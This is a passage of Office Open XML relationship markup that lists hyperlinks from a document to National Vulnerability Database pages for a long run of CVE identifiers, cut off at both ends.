Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75777" TargetMode="External" Id="rId954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76059" TargetMode="External" Id="rId955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76647" TargetMode="External" Id="rId956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76801" TargetMode="External" Id="rId957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77097" TargetMode="External" Id="rId958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77098" TargetMode="External" Id="rId959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77480" TargetMode="External" Id="rId960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77481" TargetMode="External" Id="rId961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77482" TargetMode="External" Id="rId962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77483" TargetMode="External" Id="rId963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77484" TargetMode="External" Id="rId964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77486" TargetMode="External" Id="rId965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77487" TargetMode="External" Id="rId966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77495" TargetMode="External" Id="rId967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77504" TargetMode="External" Id="rId968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77826" TargetMode="External" Id="rId969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77901" TargetMode="External" Id="rId970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77906" TargetMode="External" Id="rId971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77907" TargetMode="External" Id="rId972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77908" TargetMode="External" Id="rId973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78439" TargetMode="External" Id="rId974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78442" TargetMode="External" Id="rId975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78456" TargetMode="External" Id="rId976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78462" TargetMode="External" Id="rId977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78463" TargetMode="External" Id="rId978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78504" TargetMode="External" Id="rId979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78505" TargetMode="External" Id="rId980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78507" TargetMode="External" Id="rId981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78511" TargetMode="External" Id="rId982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78512" TargetMode="External" Id="rId983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78514" TargetMode="External" Id="rId984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78517" TargetMode="External" Id="rId985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78518" TargetMode="External" Id="rId986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78519" TargetMode="External" Id="rId987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78521" TargetMode="External" Id="rId988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78524" TargetMode="External" Id="rId989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78525" TargetMode="External" Id="rId990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78526" TargetMode="External" Id="rId991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78569" TargetMode="External" Id="rId992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78571" TargetMode="External" Id="rId993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78575" TargetMode="External" Id="rId994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78834" TargetMode="External" Id="rId995" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79376" TargetMode="External" Id="rId996" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79423" TargetMode="External" Id="rId997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79602" TargetMode="External" Id="rId998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79742" TargetMode="External" Id="rId999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79744" TargetMode="External" Id="rId1000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80074" TargetMode="External" Id="rId1001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80077" TargetMode="External" Id="rId1002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80080" TargetMode="External" Id="rId1003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80081" TargetMode="External" Id="rId1004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80083" TargetMode="External" Id="rId1005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80085" TargetMode="External" Id="rId1006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80096" TargetMode="External" Id="rId1007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80099" TargetMode="External" Id="rId1008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80130" TargetMode="External" Id="rId1009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80465" TargetMode="External" Id="rId1010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80914" TargetMode="External" Id="rId1011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80921" TargetMode="External" Id="rId1012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81211" TargetMode="External" Id="rId1013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81352" TargetMode="External" Id="rId1014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81385" TargetMode="External" Id="rId1015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81543" TargetMode="External" Id="rId1016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81550" TargetMode="External" Id="rId1017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81551" TargetMode="External" Id="rId1018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81554" TargetMode="External" Id="rId1019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81940" TargetMode="External" Id="rId1020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81941" TargetMode="External" Id="rId1021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81952" TargetMode="External" Id="rId1022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81955" TargetMode="External" Id="rId1023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81996" TargetMode="External" Id="rId1024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82089" TargetMode="External" Id="rId1025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82092" TargetMode="External" Id="rId1026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82095" TargetMode="External" Id="rId1027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82097" TargetMode="External" Id="rId1028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82098" TargetMode="External" Id="rId1029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82099" TargetMode="External" Id="rId1030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82641" TargetMode="External" Id="rId1031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83992" TargetMode="External" Id="rId1032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83996" TargetMode="External" Id="rId1033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83998" TargetMode="External" Id="rId1034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84187" TargetMode="External" Id="rId1035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84889" TargetMode="External" Id="rId1036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85049" TargetMode="External" Id="rId1037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85051" TargetMode="External" Id="rId1038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85053" TargetMode="External" Id="rId1039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85094" TargetMode="External" Id="rId1040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85228" TargetMode="External" Id="rId1041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85430" TargetMode="External" Id="rId1042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85432" TargetMode="External" Id="rId1043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85455" TargetMode="External" Id="rId1044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85677" TargetMode="External" Id="rId1045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85684" TargetMode="External" Id="rId1046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85877" TargetMode="External" Id="rId1047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86099" TargetMode="External" Id="rId1048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86404" TargetMode="External" Id="rId1049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86482" TargetMode="External" Id="rId1050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86542" TargetMode="External" Id="rId1051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86775" TargetMode="External" Id="rId1052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87430" TargetMode="External" Id="rId1053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87433" TargetMode="External" Id="rId1054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87440" TargetMode="External" Id="rId1055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87444" TargetMode="External" Id="rId1056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87460" TargetMode="External" Id="rId1057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87489" TargetMode="External" Id="rId1058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87536" TargetMode="External" Id="rId1059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87542" TargetMode="External" Id="rId1060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87569" TargetMode="External" Id="rId1061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87570" TargetMode="External" Id="rId1062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87579" TargetMode="External" Id="rId1063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87585" TargetMode="External" Id="rId1064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87587" TargetMode="External" Id="rId1065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87588" TargetMode="External" Id="rId1066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87612" TargetMode="External" Id="rId1067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87617" TargetMode="External" Id="rId1068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87625" TargetMode="External" Id="rId1069" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87636" TargetMode="External" Id="rId1070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87766" TargetMode="External" Id="rId1071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87795" TargetMode="External" Id="rId1072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87823" TargetMode="External" Id="rId1073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87927" TargetMode="External" Id="rId1074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88009" TargetMode="External" Id="rId1075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88271" TargetMode="External" Id="rId1076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88277" TargetMode="External" Id="rId1077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89046" TargetMode="External" Id="rId1078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2016-20097" TargetMode="External" Id="rId1079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2019-25765" TargetMode="External" Id="rId1080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2019-25766" TargetMode="External" Id="rId1081" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-37267" TargetMode="External" Id="rId1082" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-50997" TargetMode="External" Id="rId1083" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-51009" TargetMode="External" Id="rId1084" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-51017" TargetMode="External" Id="rId1085" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54355" TargetMode="External" Id="rId1086" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54390" TargetMode="External" Id="rId1087" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54393" TargetMode="External" Id="rId1088" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58374" TargetMode="External" Id="rId1089" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58375" TargetMode="External" Id="rId1090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58381" TargetMode="External" Id="rId1091" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58382" TargetMode="External" Id="rId1092" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-34115" TargetMode="External" Id="rId1093" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0799" TargetMode="External" Id="rId1094" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10143" TargetMode="External" Id="rId1095" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12143" TargetMode="External" Id="rId1096" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12562" TargetMode="External" Id="rId1097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12611" TargetMode="External" Id="rId1098" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14297" TargetMode="External" Id="rId1099" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16174" TargetMode="External" Id="rId1100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18608" TargetMode="External" Id="rId1101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19204" TargetMode="External" Id="rId1102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19486" TargetMode="External" Id="rId1103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21042" TargetMode="External" Id="rId1104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-23921" TargetMode="External" Id="rId1105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-29063" TargetMode="External" Id="rId1106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33197" TargetMode="External" Id="rId1107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33871" TargetMode="External" Id="rId1108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3505" TargetMode="External" Id="rId1109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35469" TargetMode="External" Id="rId1110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40192" TargetMode="External" Id="rId1111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40877" TargetMode="External" Id="rId1112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41453" TargetMode="External" Id="rId1113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41674" TargetMode="External" Id="rId1114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44494" TargetMode="External" Id="rId1115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45084" TargetMode="External" Id="rId1116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45115" TargetMode="External" Id="rId1117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45116" TargetMode="External" Id="rId1118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 